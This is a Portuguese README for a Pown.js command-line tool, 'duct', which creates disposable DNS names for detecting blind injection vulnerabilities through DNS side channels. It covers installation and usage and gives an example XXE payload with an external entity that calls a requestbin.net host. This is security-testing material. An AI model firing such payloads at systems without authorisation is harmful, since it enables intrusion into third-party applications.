
Ferramenta essencial para encontrar ataques de injeção cega.
Ferramenta essencial para encontrar ataques de injeção cega usando canais laterais de DNS.
Esta ferramenta faz parte da iniciativa open-source secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: Esta ferramenta está utilizando o serviço http://requestbin.net. Versões futuras usarão uma infraestrutura dedicada e personalizada.
Esta ferramenta é destinada a ser usada como parte do Pown.js, mas também pode ser invocada separadamente como uma ferramenta independente.
Instale o Pown primeiro como de costume:
$ npm install -g pown@latest
Invoque diretamente do Pown:
$ pown duct
Caso contrário, instale este módulo localmente a partir da raiz do seu projeto:
$ npm install @pown/duct --save
Feito isso, invoque o CLI do pown:
$ ./node_modules/.bin/pown-cli duct
Você também pode usar o pown global para invocar a ferramenta localmente:
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
Existem casos em que precisamos realizar um ataque como injeção SQL, XSS, XXE ou SSRF, mas a aplicação alvo não fornece nenhuma indicação de que é vulnerável. Uma forma de ter certeza se uma vulnerabilidade está presente é tentar injetar um vetor de ataque válido que force um resolvedor DNS a perguntar por um domínio controlado. Se a resolução for bem-sucedida, o ataque será considerado bem-sucedido.
NOTA: Você pode estar familiarizado com o Burp Collaborator, que fornece um serviço semelhante para clientes.
Primeiro, precisamos de um nome DNS descartável para resolver:
$ pown duct dns
captura de tela
Usando o DNS fornecido, componha seu payload. Por exemplo, o seguinte poderia disparar uma resolução DNS se uma vulnerabilidade XXE estiver presente.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
Se o ataque foi bem-sucedido, receberemos uma mensagem no terminal.
captura de tela